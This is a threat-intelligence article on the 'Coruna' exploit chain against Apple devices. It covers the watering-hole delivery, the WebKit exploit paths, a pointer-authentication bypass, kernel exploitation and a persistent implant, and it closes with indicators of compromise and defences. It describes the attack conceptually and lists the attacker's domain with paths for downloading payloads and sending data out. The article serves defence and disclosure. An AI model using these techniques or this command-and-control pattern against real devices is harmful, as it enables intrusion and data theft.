Researchers Uncover “Coruna” Exploit Framework Targeting Apple Devices Through Safari Vulnerabilities

CyberDefender 12 mins0

Coruna is a highly advanced exploit framework designed to compromise Apple devices through vulnerabilities in the Safari/WebKit browser engine. The toolkit targets ARM64-based systems running iOS and macOS and demonstrates a complete multi-stage attack chain that moves from browser exploitation to kernel-level compromise and persistent system access.

Security researchers discovered that the framework includes multiple exploitation paths, browser-based privilege escalation techniques, and a kernel exploit capable of granting full control over the device. The architecture indicates professional-grade exploit development and long-term maintenance, suggesting the toolkit originated from a well-resourced development environment.

The attack lifecycle begins with a compromised website that loads malicious JavaScript modules from attacker-controlled infrastructure. Once the victim visits the page, the exploit chain automatically triggers without requiring interaction. The chain then executes a sequence of browser exploitation, sandbox escape, privilege escalation, and persistent malware deployment.

Background and Discovery

In early March 2026, researchers documented a previously unknown exploit toolkit that targeted iPhone models running iOS versions between 13.0 and 17.2.1. The framework was given the name Coruna, derived from an internal developer identifier discovered in debug artifacts on a delivery server.

Threat intelligence analysis revealed that the toolkit was already circulating among multiple threat actors. The exploit code appears to have been originally developed within a high-end exploit ecosystem and later distributed through exploit brokerage networks before being deployed in operational attacks.

Several campaigns used the framework for different purposes:

  • Espionage campaigns targeting Ukrainian websites
  • Financial fraud campaigns distributing malicious cryptocurrency and gambling sites
  • Mass exploitation campaigns affecting general internet users

The evolution of the framework demonstrates how advanced cyber capabilities can migrate from specialized intelligence environments into criminal operations.

Architecture of the Exploit Framework

The recovered version of the Coruna framework consists of multiple interconnected components written primarily in obfuscated JavaScript. The toolkit is modular and designed to dynamically load the appropriate exploitation path depending on the target system.

The recovered dataset includes:

  • 28 JavaScript modules
  • ~700 KB of obfuscated code
  • WebAssembly components
  • ARM64 shellcode payloads
  • Mach-O binaries
  • Kernel exploitation modules

Each module registers itself within a custom loader system. Dependencies between modules are resolved at runtime, allowing the exploit chain to be assembled dynamically based on the victim’s environment.

Initial Infection Vector

Coruna uses a watering-hole attack technique. In this model, attackers compromise a legitimate website frequently visited by their intended targets. The malicious page includes a script that silently downloads the exploit framework from attacker infrastructure.

The initial stage performs several environment checks, including:

  • Operating system detection (iOS or macOS)
  • Browser engine identification
  • Safari/WebKit version validation
  • Lockdown Mode detection

Once the environment matches the required criteria, the system downloads the appropriate exploit modules.

The exploit payloads are retrieved from a remote domain hosting the malicious scripts. Each script file is named using SHA-1-like identifiers to obscure their purpose and avoid simple signature detection.

Browser Exploitation Stage

Coruna does not rely on a single vulnerability. Instead, the framework contains multiple exploit paths that target weaknesses in the WebKit rendering engine.

Three primary browser exploitation methods were identified:

NaN-Boxing Type Confusion

One exploitation technique manipulates JavaScriptCore’s internal memory representation of JavaScript values. The engine stores different data types using a NaN-boxing scheme. By triggering a type confusion scenario, the exploit causes the engine to misinterpret pointers as numeric values.

This manipulation allows attackers to access memory structures that should normally be inaccessible.

JIT Optimization Exploit

Another path targets the Just-In-Time (JIT) compilation pipeline. The exploit abuses optimization behaviors in the JIT compiler that remove certain structure validation checks.

By manipulating object structures during compilation, attackers create conditions where memory references become corrupted, allowing unauthorized memory manipulation.

Audio/SVG Memory Corruption

A third exploit chain targets a vulnerability involving the OfflineAudioContext API combined with SVG filter processing.

This technique allows attackers to corrupt memory buffers during media processing, eventually creating an arbitrary read/write primitive within the browser process.

Post-Exploitation Chain

After achieving code execution in the browser environment, the framework continues with additional exploitation stages.

The following sequence is typically observed:

  1. Establish arbitrary memory read/write capability
  2. Escape the WebAssembly sandbox
  3. Bypass Pointer Authentication Codes (PAC)
  4. Escape the JIT execution cage
  5. Execute native ARM64 shellcode
  6. Retrieve secondary payloads from command-and-control servers

One notable technique involves temporarily modifying entries in the Global Offset Table to bypass Apple’s pointer authentication mechanism. Instead of forging PAC signatures directly, the exploit leverages legitimate system routines that automatically validate pointer authentication, effectively using the operating system to authenticate attacker-supplied addresses.

Kernel Exploitation

Once code execution is achieved in user space, the exploit downloads a kernel module containing a privilege escalation exploit.

The kernel payload is delivered as a Mach-O dynamic library designed for ARM64 devices. The file is approximately 2 MB in size and contains hundreds of functions dedicated to bypassing system security mechanisms.

The kernel exploit targets the IOSurfaceRoot subsystem, a commonly exploited component within the iOS kernel. The vulnerability allows attackers to manipulate GPU surface objects in a way that results in kernel memory corruption.

Successful exploitation provides:

  • Kernel read/write access
  • Sandbox escape
  • Privilege escalation
  • Root filesystem modification

At this stage, the attacker effectively gains complete control over the device.

Command and Control Communication

Communication between infected devices and the attacker infrastructure occurs over HTTP.

The exploit performs two types of network operations:

Payload retrieval : GET https://b27.icu/<payload>

Data exfiltration : POST https://b27.icu/<endpoint>

The transmitted data typically includes:

  • Process information
  • Browser user-agent
  • Current URL
  • Device configuration data

To avoid caching and detection, each request includes random query parameters.

Post-Exploitation Malware

The final stage of the attack installs a persistent malware component referred to as PlasmaLoader.

This implant establishes long-term command-and-control access and includes fallback communication mechanisms. If the primary command servers become unavailable, the malware generates alternative domains using a domain generation algorithm seeded with a predefined string.

This ensures continued attacker control even if infrastructure is disrupted.

Indicators of Compromise

Several observable indicators may reveal Coruna activity within enterprise environments.

Network Indicators

  • DNS requests to unusual .icu domains
  • Rapid sequential downloads of JavaScript files with long hexadecimal names
  • Frequent HTTP requests with randomized parameters

Host Indicators

  • Unexpected RWX memory allocations in browser processes
  • Large ArrayBuffer allocations within Safari
  • Network communication originating from browser sandbox processes

Defensive Recommendations

Organizations can reduce exposure to this exploit chain by implementing several defensive measures:

  1. Maintain current versions of Safari and WebKit.
  2. Enable Lockdown Mode on high-risk devices.
  3. Monitor DNS queries for suspicious top-level domains.
  4. Implement browser isolation technologies.
  5. Deploy network detection signatures such as YARA or Suricata rules.
  6. Restrict browser processes from accessing sensitive network resources.

Assessment of Sophistication

The Coruna exploit framework demonstrates an unusually high level of technical sophistication.

The framework includes:

  • Modular exploit architecture
  • Multiple browser exploit paths
  • Custom WebAssembly primitives
  • Pointer authentication bypass techniques
  • Kernel privilege escalation
  • Persistent malware deployment

The breadth and complexity of the exploit chain strongly suggest development by experienced exploit engineers rather than opportunistic attackers.

Conclusion

Coruna represents a complete end-to-end exploitation framework targeting Apple devices through Safari and the WebKit rendering engine. The toolkit combines browser vulnerabilities, sandbox escape mechanisms, kernel exploitation, and persistent malware installation into a unified attack chain.

The modular design and technical depth demonstrate a mature exploitation capability capable of adapting to different operating system versions and hardware platforms.

Although the vulnerabilities involved have since been patched, the techniques used within Coruna illustrate the ongoing evolution of advanced exploitation frameworks and highlight the importance of rapid patch deployment and layered defensive monitoring.

CyberDefender